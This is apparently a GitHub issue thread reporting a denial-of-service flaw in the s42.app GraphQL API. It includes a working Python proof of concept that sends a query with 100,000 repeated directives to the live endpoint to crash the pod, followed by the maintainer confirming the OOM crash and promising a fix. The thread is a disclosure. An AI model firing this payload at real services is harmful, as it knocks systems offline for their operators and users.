fix: uncontrolled resource consumption

[nullswan]

Describe the bug

You can crash the API pod by overloading the graphql parser.

With a bit of threading you can take down the whole API:

To Reproduce

import requests
import time

url = 'https://s42.app/graphql'
max_size = int(1e5)
payload = {'query': 'query{\n__typename ' + ('@a'*max_size) + '\n}', 'variables': {}, 'operationName': None}

headers = {
    'Content-Type': 'application/json',
}

try:
    start = time.monotonic()
    response = requests.request('POST', url, headers=headers, json=payload)
    end = time.monotonic()
    print(response.text)
    print(f'Elapsed time: {end-start}')
except requests.exceptions.ConnectionError:
    print('Connection closed.')

Expected behavior

No response

Relevant log output

No response

Version of software

idk

Environment

Live (https://s42.app)

Additional context

No response

Code of Conduct

• I agree to follow this project's Code of Conduct

[42atomys]

Hello @c3b5aw, thanks for your reporting.

As well infrastructure autoscaling is not based on flow pressure and only on basic cpu / ram consumption.

I have check on the monitoring dashboard https://dashboards.s42.app

For collaborators and monitoring squad only (dashboard is not finished and stay private): https://dashboards.s42.app/d/KD4xvlJ4k/pod-dashboard?orgId=1&kiosk=tv&from=now-3h&to=now

The objective of the autoscaling is to be based on custom data reported directly by the api pod metrics.

Do you have a vision of that ? A desire to participe on the discussion ?

Best regards

[42atomys]

Confirmed on our end, the issue is caused by an OOMKilled error. This query is currently parsed but not filtered by the HTTP handler.

I will begin fixing it for the next release.